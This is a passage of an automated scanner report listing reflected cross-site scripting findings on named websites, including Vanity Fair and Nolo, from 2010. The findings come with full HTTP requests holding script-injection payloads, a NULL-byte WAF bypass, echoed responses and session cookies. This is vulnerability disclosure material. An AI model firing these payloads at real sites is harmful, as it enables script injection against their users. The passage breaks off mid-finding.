The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 15fa3<script>alert(1)</script>4cae3a07bf6 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /spring/event/most.go?callback=jsonp129105174756615fa3<script>alert(1)</script>4cae3a07bf6&_=1291051748601&env=PROD&site=VYF&type=all&event=most_emailed&num=5&day=2 HTTP/1.1 Host: result.vanityfair.com Proxy-Connection: keep-alive Referer: http://www.vanityfair.com/services/privacypolicy Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_campaign%3D%7C1291053548489%3B%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20sinvisit_m%3Dtrue%7C1291053548494%3B%20s_nr%3D1291051748509%7C1293643748509%3B%20s_eVar10%3D%7C1291053548515%3B%20s_depth%3D1%7C1291053548518%3B%20gpv_p5%3Dno%2520value%7C1291053548530%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=122134540.197414222.1291051749.1291051749.1291051749.1; __utmc=122134540; __utmb=122134540.1.10.1291051749
Response
HTTP/1.1 200 OK Content-Type: application/javascript Date: Mon, 29 Nov 2010 16:59:31 GMT Content-Length: 1309 Connection: close
jsonp129105174756615fa3<script>alert(1)</script>4cae3a07bf6([{"rank":1,"contentId":"culture/features/2010/12/vanishing-blonde-201012","contentTitle":"The Case of the Vanishing Blonde","contentUrl":"http://www.vanityfair.com/culture/features/2010/12/vanishing-b ...[SNIP]...
The value of the qt request parameter is copied into the HTML document as plain text between tags. The payload %0022c28<script>alert(1)</script>079b7191186 was submitted in the qt parameter. This input was echoed as 22c28<script>alert(1)</script>079b7191186 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /query.html?col=glossary&qt=arrest%0022c28<script>alert(1)</script>079b7191186&submit.x=22&submit.y=11&submit=search HTTP/1.1 Host: search.nolo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Server: Ultraseek/5.3.4 Cache-control: public Expires: Mon, 29 Nov 2010 17:16:48 GMT Date: Mon, 29 Nov 2010 17:15:48 GMT Content-type: text/html; charset=iso-8859-1 Content-length: 10701 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 4.01 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conten ...[SNIP]... <strong class="searchTerm">arrest.22c28<script>alert(1)</script>079b7191186</strong> ...[SNIP]...
1.93. https://secure.vanityfair.com/services/newsletters [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://secure.vanityfair.com
Path:
/services/newsletters
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3c44"><script>alert(1)</script>c5b05c645d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /services/newsletters?e3c44"><script>alert(1)</script>c5b05c645d1=1 HTTP/1.1 Host: secure.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 17:15:55 GMT Server: Resin/3.1.6 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Language: en Content-Type: text/html; charset=UTF-8 Set-Cookie: JSESSIONID=adbve7ezOmNCr6EgJOyYs.1; domain=.vanityfair.com; path=/ Connection: close Content-Length: 78507
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/services/newsletters?printable=true&e3c44"><script>alert(1)</script>c5b05c645d1=1" title="Print this page"> ...[SNIP]...
The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 4f58c<script>alert(1)</script>ef1e1c23d1d was submitted in the cb parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ver1.0/Direct/Jsonp?r=%7B%22Requests%22%3A%5B%7B%22DiscoverContentAction%22%3A%7B%22Activity%22%3A%7B%22Activity%22%3A%7B%22Name%22%3A%22Commented%22%7D%7D%2C%22Age%22%3A2%2C%22ContentType%22%3A%7B%22ContentType%22%3A%7B%22Name%22%3A%22Article%22%7D%7D%2C%22LimitToContributors%22%3A%5B%7B%22UserTier%22%3A%7B%22Name%22%3A%22All%22%7D%7D%5D%2C%22MaximumNumberOfDiscoveries%22%3A5%2C%22SearchCategories%22%3A%5B%7B%22Category%22%3A%7B%22Name%22%3A%22ALL%22%7D%7D%5D%2C%22SearchSections%22%3A%5B%7B%22Section%22%3A%7B%22Name%22%3A%22ALL%22%7D%7D%5D%7D%7D%5D%2C%22UniqueId%22%3A0%7D&cb=RequestBatch.callbacks.daapiCallback04f58c<script>alert(1)</script>ef1e1c23d1d HTTP/1.1 Host: sitelife.vanityfair.com Proxy-Connection: keep-alive Referer: http://www.vanityfair.com/services/privacypolicy Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_campaign%3D%7C1291053548489%3B%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20sinvisit_m%3Dtrue%7C1291053548494%3B%20s_nr%3D1291051748509%7C1293643748509%3B%20s_eVar10%3D%7C1291053548515%3B%20s_depth%3D1%7C1291053548518%3B%20gpv_p5%3Dno%2520value%7C1291053548530%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=122134540.197414222.1291051749.1291051749.1291051749.1; __utmc=122134540; __utmb=122134540.1.10.1291051749
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 84c5a<script>alert(1)</script>10c612df716 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Anger_Management84c5a<script>alert(1)</script>10c612df716/x22 HTTP/1.1 Host: vermont.uscity.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 403 Forbidden Date: Mon, 29 Nov 2010 17:16:05 GMT Server: Apache/2.2.3 (CentOS) Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 7270
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD><TITLE>403 Forbidden</TITLE> <META content="403 Forbidden" name=description> <META content=TRUE name=MSSmartTagsPreventParsing>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 84dcc<script>alert(1)</script>47fad8a2dba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Anger_Management/x2284dcc<script>alert(1)</script>47fad8a2dba HTTP/1.1 Host: vermont.uscity.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 403 Forbidden Date: Mon, 29 Nov 2010 17:16:06 GMT Server: Apache/2.2.3 (CentOS) Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 7270
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD><TITLE>403 Forbidden</TITLE> <META content="403 Forbidden" name=description> <META content=TRUE name=MSSmartTagsPreventParsing>
1.97. http://vermont.uscity.net/Anger_Management/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://vermont.uscity.net
Path:
/Anger_Management/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a07fa<script>alert(1)</script>c404752f083 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Anger_Management/x22?a07fa<script>alert(1)</script>c404752f083=1 HTTP/1.1 Host: vermont.uscity.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 403 Forbidden Date: Mon, 29 Nov 2010 17:16:05 GMT Server: Apache/2.2.3 (CentOS) Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 7273
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD><TITLE>403 Forbidden</TITLE> <META content="403 Forbidden" name=description> <META content=TRUE name=MSSmartTagsPreventParsing>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83da1'%3bb72e7fd243b was submitted in the REST URL parameter 4. This input was echoed as 83da1';b72e7fd243b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /COM/iview/245726341/direct83da1'%3bb72e7fd243b;wi.300;hi.250/01?click=http%3A%2F%2Fads%2Ebluelithium%2Ecom%2Fclk%3F2%2C13%253Bdaa4c45afb25564b%253B12c98774d75%2C0%253B%253B%253B3196617298%2CA%2EtBADjjDACfhFYAAAAAAAWmFwAAAAAAAAAAAAIAAAAAAA8AAgACCzwFIQAAAAAAkDkfAAAAAAAUih8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLpAYAAAAAAAIAAwAAAAAAdU13mCwBAAAAAAAAAGM2OTlhMGVjLWZiZDUtMTFkZi1iNTFhLTAwMWU2ODU3M2MyMQAzmSoAAAA%3D%2C%2Chttp%253A%252F%252Fguide%2Eopendns%2Ecom%252Fmain%253Furl%253Dadvancedmags%2Ecom%2526servfail%253D%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D1291048144844600-39616%26campID%3D18450%26crID%3D39616%26pubICode%3D2046352%26pub%3D271361%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fguide%2Eopendns%2Ecom%2Fmain%3Furl%3Dadvancedmags%2Ecom%26servfail%3D%26redirectURL%3D HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?A.tBADjjDACfhFYAAAAAAAWmFwAAAAAAAAAAAAIAAAAAAA8AAgACCzwFIQAAAAAAkDkfAAAAAAAUih8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLpAYAAAAAAAIAAwAAAAAAzczMzMzMAEAAAAAAAAASQM3MzMzMzBBAAAAAAAAAIkDNzMzMzMwQQAAAAAAAACJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALlxy1Trk8CdDAFodg4BP8XP87rdfGPR.0R2cgAAAAAA==,,http%3A%2F%2Fguide.opendns.com%2Fmain%3Furl%3Dadvancedmags.com%26servfail%3D,Z%3D300x250%26s%3D844600%26_salt%3D3318663486%26B%3D10%26u%3Dhttp%253A%252F%252Fguide.opendns.com%252Fmain%253Furl%253Dadvancedmags.com%2526servfail%253D%26r%3D1,c699a0ec-fbd5-11df-b51a-001e68573c21 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: MUID=484C17C84DEE440386469B4B8F7D0E08; AA002=1286756359-11647780; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18:9cc2/1a43a:64eb/2506e:fb49/4a29; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6:b50e070/1a43a/b8d1492/9cc2/4ceb0bb8:b73afdb/2506e/1065856f/64eb/4ceb26f5:b09bfb0/4a29/fbe4441/fb49/4cf1b708
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 11052 Content-Type: text/html Expires: 0 Connection: close Date: Mon, 29 Nov 2010 17:01:20 GMT
1.99. http://redcated/COM/iview/245726341/direct [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/COM/iview/245726341/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25ed5"><script>alert(1)</script>6b38c822330 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /COM/iview/245726341/direct;wi.300;hi.250/01?click=http%3A%2F%2Fads%2Ebluelithium%2Ecom%2Fclk%3F2%2C13%253Bdaa4c45afb25564b%253B12c98774d75%2C0%253B%253B%253B3196617298%2CA%2EtBADjjDACfhFYAAAAAAAWmFwAAAAAAAAAAAAIAAAAAAA8AAgACCzwFIQAAAAAAkDkfAAAAAAAUih8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLpAYAAAAAAAIAAwAAAAAAdU13mCwBAAAAAAAAAGM2OTlhMGVjLWZiZDUtMTFkZi1iNTFhLTAwMWU2ODU3M2MyMQAzmSoAAAA%3D%2C%2Chttp%253A%252F%252Fguide%2Eopendns%2Ecom%252Fmain%253Furl%253Dadvancedmags%2Ecom%2526servfail%253D%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D1291048144844600-39616%26campID%3D18450%26crID%3D39616%26pubICode%3D2046352%26pub%3D271361%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fguide%2Eopendns%2Ecom%2Fmain%3Furl%3Dadvancedmags%2Ecom%26servfail%3D%26redirectURL%3D&25ed5"><script>alert(1)</script>6b38c822330=1 HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?A.tBADjjDACfhFYAAAAAAAWmFwAAAAAAAAAAAAIAAAAAAA8AAgACCzwFIQAAAAAAkDkfAAAAAAAUih8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLpAYAAAAAAAIAAwAAAAAAzczMzMzMAEAAAAAAAAASQM3MzMzMzBBAAAAAAAAAIkDNzMzMzMwQQAAAAAAAACJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALlxy1Trk8CdDAFodg4BP8XP87rdfGPR.0R2cgAAAAAA==,,http%3A%2F%2Fguide.opendns.com%2Fmain%3Furl%3Dadvancedmags.com%26servfail%3D,Z%3D300x250%26s%3D844600%26_salt%3D3318663486%26B%3D10%26u%3Dhttp%253A%252F%252Fguide.opendns.com%252Fmain%253Furl%253Dadvancedmags.com%2526servfail%253D%26r%3D1,c699a0ec-fbd5-11df-b51a-001e68573c21 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: MUID=484C17C84DEE440386469B4B8F7D0E08; AA002=1286756359-11647780; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18:9cc2/1a43a:64eb/2506e:fb49/4a29; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6:b50e070/1a43a/b8d1492/9cc2/4ceb0bb8:b73afdb/2506e/1065856f/64eb/4ceb26f5:b09bfb0/4a29/fbe4441/fb49/4cf1b708
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 11120 Content-Type: text/html Expires: 0 Connection: close Date: Mon, 29 Nov 2010 17:01:14 GMT
1.100. http://redcated/COM/iview/245726341/direct [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/COM/iview/245726341/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c725'-alert(1)-'d3fe4c42496 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /COM/iview/245726341/direct;wi.300;hi.250/01?click=http%3A%2F%2Fads%2Ebluelithium%2Ecom%2Fclk%3F2%2C13%253Bdaa4c45afb25564b%253B12c98774d75%2C0%253B%253B%253B3196617298%2CA%2EtBADjjDACfhFYAAAAAAAWmFwAAAAAAAAAAAAIAAAAAAA8AAgACCzwFIQAAAAAAkDkfAAAAAAAUih8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLpAYAAAAAAAIAAwAAAAAAdU13mCwBAAAAAAAAAGM2OTlhMGVjLWZiZDUtMTFkZi1iNTFhLTAwMWU2ODU3M2MyMQAzmSoAAAA%3D%2C%2Chttp%253A%252F%252Fguide%2Eopendns%2Ecom%252Fmain%253Furl%253Dadvancedmags%2Ecom%2526servfail%253D%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D1291048144844600-39616%26campID%3D18450%26crID%3D39616%26pubICode%3D2046352%26pub%3D271361%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fguide%2Eopendns%2Ecom%2Fmain%3Furl%3Dadvancedmags%2Ecom%26servfail%3D%26redirectURL%3D&7c725'-alert(1)-'d3fe4c42496=1 HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?A.tBADjjDACfhFYAAAAAAAWmFwAAAAAAAAAAAAIAAAAAAA8AAgACCzwFIQAAAAAAkDkfAAAAAAAUih8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLpAYAAAAAAAIAAwAAAAAAzczMzMzMAEAAAAAAAAASQM3MzMzMzBBAAAAAAAAAIkDNzMzMzMwQQAAAAAAAACJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALlxy1Trk8CdDAFodg4BP8XP87rdfGPR.0R2cgAAAAAA==,,http%3A%2F%2Fguide.opendns.com%2Fmain%3Furl%3Dadvancedmags.com%26servfail%3D,Z%3D300x250%26s%3D844600%26_salt%3D3318663486%26B%3D10%26u%3Dhttp%253A%252F%252Fguide.opendns.com%252Fmain%253Furl%253Dadvancedmags.com%2526servfail%253D%26r%3D1,c699a0ec-fbd5-11df-b51a-001e68573c21 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: MUID=484C17C84DEE440386469B4B8F7D0E08; AA002=1286756359-11647780; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18:9cc2/1a43a:64eb/2506e:fb49/4a29; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6:b50e070/1a43a/b8d1492/9cc2/4ceb0bb8:b73afdb/2506e/1065856f/64eb/4ceb26f5:b09bfb0/4a29/fbe4441/fb49/4cf1b708
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 10451 Content-Type: text/html Expires: 0 Connection: close Date: Mon, 29 Nov 2010 17:01:16 GMT
1.101. http://redcated/COM/iview/245726341/direct [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/COM/iview/245726341/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0ac6"-alert(1)-"5cf4364f963 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /COM/iview/245726341/direct;wi.300;hi.250/01?click=http%3A%2F%2Fads%2Ebluelithium%2Ecom%2Fclk%3F2%2C13%253Bdaa4c45afb25564b%253B12c98774d75%2C0%253B%253B%253B3196617298%2CA%2EtBADjjDACfhFYAAAAAAAWmFwAAAAAAAAAAAAIAAAAAAA8AAgACCzwFIQAAAAAAkDkfAAAAAAAUih8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLpAYAAAAAAAIAAwAAAAAAdU13mCwBAAAAAAAAAGM2OTlhMGVjLWZiZDUtMTFkZi1iNTFhLTAwMWU2ODU3M2MyMQAzmSoAAAA%3D%2C%2Chttp%253A%252F%252Fguide%2Eopendns%2Ecom%252Fmain%253Furl%253Dadvancedmags%2Ecom%2526servfail%253D%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D1291048144844600-39616%26campID%3D18450%26crID%3D39616%26pubICode%3D2046352%26pub%3D271361%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fguide%2Eopendns%2Ecom%2Fmain%3Furl%3Dadvancedmags%2Ecom%26servfail%3D%26redirectURL%3D&a0ac6"-alert(1)-"5cf4364f963=1 HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?A.tBADjjDACfhFYAAAAAAAWmFwAAAAAAAAAAAAIAAAAAAA8AAgACCzwFIQAAAAAAkDkfAAAAAAAUih8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLpAYAAAAAAAIAAwAAAAAAzczMzMzMAEAAAAAAAAASQM3MzMzMzBBAAAAAAAAAIkDNzMzMzMwQQAAAAAAAACJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALlxy1Trk8CdDAFodg4BP8XP87rdfGPR.0R2cgAAAAAA==,,http%3A%2F%2Fguide.opendns.com%2Fmain%3Furl%3Dadvancedmags.com%26servfail%3D,Z%3D300x250%26s%3D844600%26_salt%3D3318663486%26B%3D10%26u%3Dhttp%253A%252F%252Fguide.opendns.com%252Fmain%253Furl%253Dadvancedmags.com%2526servfail%253D%26r%3D1,c699a0ec-fbd5-11df-b51a-001e68573c21 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: MUID=484C17C84DEE440386469B4B8F7D0E08; AA002=1286756359-11647780; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18:9cc2/1a43a:64eb/2506e:fb49/4a29; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6:b50e070/1a43a/b8d1492/9cc2/4ceb0bb8:b73afdb/2506e/1065856f/64eb/4ceb26f5:b09bfb0/4a29/fbe4441/fb49/4cf1b708
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 11045 Content-Type: text/html Expires: 0 Connection: close Date: Mon, 29 Nov 2010 17:01:16 GMT
The value of the wi.300;hi.250/01?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4478'-alert(1)-'ea244a6685e was submitted in the wi.300;hi.250/01?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
